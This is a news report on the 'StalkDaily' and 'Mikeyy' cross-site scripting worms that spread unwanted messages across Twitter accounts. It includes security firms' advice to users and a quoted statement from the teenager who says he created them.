Chicago (IL) – The Twitter micro-blogging network has been hit by two cross-site scripting (XSS) attacks that spread messages from user accounts across the system without users’ consent. The initial “StalkDaily” messages that appeared over the weekend are now followed by a “Mikeyy” attack that apparently can infect Twitter accounts simply by viewing another infected Twitter page.
The attack was first reported to have surfaced late Friday last week and since then has somewhat mutated with different messages.
Security firms such as Sophos indicate that users do not need to click on a suspicious message containing the words “StalkDaily” or “Mikeyy” to get infected, but will be hit simply when viewing a corrupted file. While Twitter said it is closing the vulnerabilities, security experts advice users to use third-party Twitter clients such as TweetDeck and, if you are using the web-based Twitter version, not to click on “StalkDaily” or “Mikeyy” messages and stay away from viewing user profiles.
There are no reports of actual damage caused by the XSS attacks.
BNONews reported that the attacks have been created by 17-year old Mike Mooney out of “boredom”, to “make money” and to promote his own website StalkDaily.
“I am the person who coded the XSS which then acted as a worm when it auto updated a users profile and status, which then infected other users who viewed their profile,” he wrote to BNONews. “I did this out of boredom, to be honest. I usually like to find vulnerabilities within websites and try not to cause too much damage, but start a worm or something to give the developers an insight on the problem and while doing so, promoting myself or my website.”